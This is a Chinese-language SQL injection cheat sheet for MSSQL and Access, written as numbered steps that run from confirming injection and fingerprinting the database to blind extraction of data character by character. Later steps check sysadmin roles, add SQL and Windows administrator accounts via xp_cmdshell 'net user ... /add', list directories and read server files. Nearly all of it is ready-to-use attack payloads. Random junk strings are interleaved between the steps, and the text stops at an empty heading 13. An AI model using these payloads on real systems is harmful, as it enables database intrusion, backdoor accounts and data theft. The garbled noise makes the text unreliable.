1.判断是否有注入 ;and 1=1 ;and 1=2（两次请求返回页面不同即说明参数被带入查询）
2.初步判断是否是mssql ;and user>0（user 返回 nvarchar，与整数比较会触发类型转换错误，错误信息中带出当前数据库用户名；依赖页面回显数据库错误）
bQ5\ ]5M
3.注入参数是字符型 'and [查询条件] and ''='
-%4,@
x`
4.搜索时没过滤参数的 'and [查询条件] and '%25'='（%25 是 URL 编码后的 %，用于闭合搜索语句中的 like '%...%'）
D3K8F@d
5.判断数据库系统
r@,2E6xn
;and (select count(*) from sysobjects)>0  → mssql（sysobjects 是 SQL Server 的系统表/兼容视图）
%N_%JK\{@
;and (select count(*) from msysobjects)>0  → access（msysobjects 是 Access 系统表；默认对普通连接不可读，返回“无读取权限”错误同样可作为 Access 的判断依据）
^dxTm1Z
8a"%0d#
xe$_aBU
6.猜表名 ;and (select Count(*) from [表名])>0（原文写作“数据库名”，此处实际猜的是表名）
Q=dy<kg']
7.猜字段 ;and (select Count(字段名) from 表名)>0
7IM@i>p%
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 表名)>0（无 order by 的 top 1 返回哪一行并不确定，后续逐字符猜解应加 where/order by 固定到同一行）
{(?4!rh
9.(1)猜字段的ascii值(access)
#
SZCze"`[
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0（把 >0 换成 >N 二分逼近出字符码，再改 mid 的起始位置猜下一个字符）
|sZHUf_
(2)猜字段的ascii值(mssql)
f`66h M[
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0
Yu`~U,m
10.测试权限结构(mssql)
wwcBsJ1{
^LzF@{ G
_h1mF<\ X^
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--（IS_SRVROLEMEMBER 返回 1 表示当前登录属于该服务器角色，0 表示不属于，NULL 表示角色名无效；第11条的加帐户操作需要 sysadmin）
_GPl gp:
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
|! "eWTJ
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
o3}3p]S\
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
)}O8?d`
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
( &x['IR
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
LjHVJSC
;and 1=(select IS_MEMBER('db_owner'));--（IS_MEMBER 检查的是当前数据库的数据库角色；第12条要在当前库 create table，需要相应的建表权限）
Ny)X+2Ae
C+&l<
fM&
DLNbo2C
11.添加mssql和系统的帐户（以下操作需要 sysadmin 权限；xp_cmdshell 自 SQL Server 2005 起默认关闭，需先通过 sp_configure 开启）
ZqO^f*F>h
;exec master.dbo.sp_addlogin username;--（sp_addlogin/sp_password 在新版本中已弃用，对应 create login / alter login）
;exec master.dbo.sp_password null,password,username;--（sp_password 的参数顺序为 旧密码,新密码,登录名，原文把新密码和登录名写反了）
FHI ;)wn=
;exec master.dbo.sp_addsrvrolemember username,sysadmin;--（sp_addsrvrolemember 的参数顺序为 登录名,角色名，原文顺序写反）
.(2ik5A%9
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--（原文被折成两行，且 /workstations:* 与 /times:all 之间缺少空格）
'H <\x
;exec master.dbo.xp_cmdshell 'net user username password /add';--
x]ot 2
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--（非英文系统上管理员组名可能不同）
E8&TO~"a]e
y4fdq7i~}9
9=2$8JN=(l
12.(1)遍历目录
b>JDH1)
;create table dirs(paths varchar(100), id int)（xp_dirtree 返回 subdirectory、depth 两列，与此表结构对应；路径超过 100 字符时 insert 会因截断而报错）
y:l\$pGC%
;insert dirs exec master.dbo.xp_dirtree 'c:\'
$ L]lHji
;and (select top 1 paths from dirs)>0（varchar 与 int 比较触发类型转换错误，目录名随错误信息回显；依赖页面回显数据库错误）
~W]TD@w
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0（原文末尾 >) 为笔误，应为 >0；每得到一个目录名就追加进 not in 列表，逐个取出）
l1Fc>:o{
M\Kx'N
z2>lI9D4V
(2)遍历目录
hY8reQp1
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器（返回 4 列，与 temp 表的列数一致）
UFuX@Lu0
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
x-3\Ls[I
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
o{[YA}xc
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容（同样依赖 xp_cmdshell 已开启）
:9 ^*
^T
kMd.h[X~
Q]>.b%s[
13.mssql中的存储过程